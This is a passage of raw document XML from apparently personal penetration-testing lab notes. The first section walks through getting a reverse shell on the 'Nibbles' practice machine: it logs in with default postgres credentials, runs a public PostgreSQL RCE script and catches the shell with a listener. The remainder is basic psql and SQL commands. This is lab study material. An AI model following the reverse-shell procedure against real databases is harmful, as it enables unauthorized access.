      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l1jq28ltbswq" w:id="219"/>
      <w:bookmarkEnd w:id="219"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell from PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Nibbles PG Practice, after logging in as postgres:postgres, we saw that we were running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 11.7 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">so we searched up "Postgresql 11.7 reverse shell" and found this github page. If you look at other searches, it seems like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 9.3-11.7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is vulnerable to authenticated RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId542">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/squid22/PostgreSQL_RCE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We git clone the script onto our Kali machine, we open it in Vim and modify the local and remote IP/port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We setup a penelope listener on port 80 on our Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We type the following command to execute the RCE script and receive a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1385"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 postgresql_rce.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we get foothold</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jlatb2cxre0l" w:id="220"/>
      <w:bookmarkEnd w:id="220"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ABA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ABB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Navigation in psql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ABC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once connected, you can use these basic commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ABD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. See Available Databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ABE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ABF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This lists all databases on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Switch to a Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\c &lt;database_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. List Tables in the Current Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\dt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows all tables in the current database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. View Columns in a Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1486"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\d &lt;table_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1486"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This lists all columns, their data types, and constraints for the users table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Exit the psql Tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="761"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Querying Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: Make sure to include the semicolon ";" at the end of each command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD3">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once connected to a database, you can run SQL queries. Here are some common examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. View All Rows in a Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM &lt;table_name&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Limit the Number of Results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM &lt;table_name&gt; LIMIT 5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Search for Specific Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the WHERE clause to filter rows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM &lt;table_name&gt; WHERE &lt;column&gt; = '&lt;value&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Count Rows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT COUNT(*) FROM &lt;table_name&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Check for Flags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
